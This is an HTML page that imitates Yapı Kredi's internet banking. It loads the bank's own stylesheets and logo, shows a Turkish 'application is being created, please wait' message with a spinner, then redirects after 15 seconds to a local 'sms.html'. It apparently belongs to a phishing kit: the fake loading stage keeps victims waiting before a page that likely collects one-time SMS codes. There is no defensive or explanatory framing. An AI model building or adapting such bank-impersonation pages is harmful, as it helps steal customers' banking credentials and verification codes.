<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Yapı Kredi</title>
    <link rel="stylesheet" href="https://internetsube.yapikredi.com.tr/ngi-static/css/source/fonts.css">
    <link rel="stylesheet" href="https://internetsube.yapikredi.com.tr/ngi-static/css/main.ui.min.css">
    <link rel="stylesheet" href="main.css">
    <style>
        body {
            margin: 0;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: Arial, sans-serif;
        }
        .container {
            text-align: center;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }
        .loading-message {
            font-size: 24px;
            margin-bottom: 20px;
        }
        .spinner {
            border: 8px solid #f3f3f3;
            border-top: 8px solid #3498db;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 2s linear infinite;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="https://internetsube.yapikredi.com.tr/ngi-static/img/logo.png" alt="Yapı Kredi Logo">
        </div>
        <div class="loading-message">Başvurunuz Oluşturuluyor Lütfen Bekleyiniz...</div>
        <div class="spinner"></div>
    </div>

    <script>
        setTimeout(function() {
            window.location.href = "sms.html";
        }, 15000);
    </script>
</body>
</html>
